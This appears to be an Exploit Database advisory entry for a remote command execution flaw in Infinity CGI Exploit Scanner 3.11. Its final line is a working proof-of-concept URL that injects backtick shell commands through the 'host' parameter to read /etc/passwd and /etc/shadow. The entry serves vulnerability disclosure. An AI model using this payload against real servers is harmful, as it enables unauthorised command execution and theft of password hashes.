Infinity CGI Exploit Scanner 3.11 - Remote Command Execution

Author: badpack3t
type: webapps
platform: cgi
port: 
date_added: 2003-06-12  
date_updated: 2012-11-17  
verified: 1  
codes: OSVDB-54142  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22772.txt  
source: https://www.securityfocus.com/bid/7913/info

Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process.

http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd``
cat%20/etc/shadow`&port=80&errchk=0&idsbypass=0